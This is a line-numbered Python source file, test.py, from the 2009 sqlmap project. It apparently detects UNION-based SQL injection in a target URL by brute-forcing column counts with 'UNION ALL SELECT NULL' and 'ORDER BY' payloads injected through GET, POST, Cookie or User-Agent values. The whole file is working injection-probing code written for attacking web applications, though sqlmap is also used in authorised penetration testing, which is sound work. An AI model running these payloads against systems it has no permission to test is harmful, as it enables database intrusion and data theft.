4
$Id: test.py 327 2009-01-12 21:35:38Z inquisb $
6
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
8
Copyright (c) 2006-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
9
and Daniele Bellucci <daniele.bellucci@gmail.com>
11
sqlmap is free software; you can redistribute it and/or modify it under
12
the terms of the GNU General Public License as published by the Free
13
Software Foundation version 2 of the License.
15
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
16
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
17
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
20
You should have received a copy of the GNU General Public License along
21
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
22
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
27
from lib.core.agent import agent
28
from lib.core.data import conf
29
from lib.core.data import kb
30
from lib.core.data import logger
31
from lib.core.data import queries
32
from lib.core.session import setUnion
33
from lib.request.connect import Connect as Request
36
def __forgeUserFriendlyValue(payload):
39
if kb.injPlace == "GET":
40
value = "%s?%s" % (conf.url, payload)
41
elif kb.injPlace == "POST":
42
value = "URL:\t'%s'" % conf.url
43
value += "\nPOST:\t'%s'\n" % payload
44
elif kb.injPlace == "Cookie":
45
value = "URL:\t'%s'" % conf.url
46
value += "\nCookie:\t'%s'\n" % payload
47
elif kb.injPlace == "User-Agent":
48
value = "URL:\t\t'%s'" % conf.url
49
value += "\nUser-Agent:\t'%s'\n" % payload
54
def __unionTestByNULLBruteforce(comment):
56
This method tests if the target url is affected by an inband
57
SQL injection vulnerability. The test is done up to 50 columns
58
on the target database table
63
query = agent.prefixQuery(" UNION ALL SELECT NULL")
65
for count in range(0, 50):
66
if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
67
query = query[:-len(" FROM DUAL")]
72
if kb.dbms == "Oracle":
75
commentedQuery = agent.postfixQuery(query, comment)
76
payload = agent.payload(newValue=commentedQuery)
77
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
81
value = __forgeUserFriendlyValue(payload)
88
def __unionTestByOrderBy(comment):
92
for count in range(1, 51):
93
query = agent.prefixQuery(" ORDER BY %d" % count)
94
orderByQuery = agent.postfixQuery(query, comment)
95
payload = agent.payload(newValue=orderByQuery)
96
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
102
value = __forgeUserFriendlyValue(prevPayload)
106
prevPayload = payload
108
return value, columns
113
This method tests if the target url is affected by an inband
114
SQL injection vulnerability. The test is done up to 3*50 times
117
if conf.uTech == "orderby":
118
technique = "ORDER BY clause bruteforcing"
120
technique = "NULL bruteforcing"
122
logMsg = "testing inband sql injection on parameter "
123
logMsg += "'%s' with %s technique" % (kb.injParameter, technique)
129
for comment in (queries[kb.dbms].comment, ""):
130
if conf.uTech == "orderby":
131
value, columns = __unionTestByOrderBy(comment)
133
value, columns = __unionTestByNULLBruteforce(comment)
136
setUnion(comment, columns)
141
logMsg = "the target url could be affected by an "
142
logMsg += "inband sql injection vulnerability"
145
warnMsg = "the target url is not affected by an "
146
warnMsg += "inband sql injection vulnerability"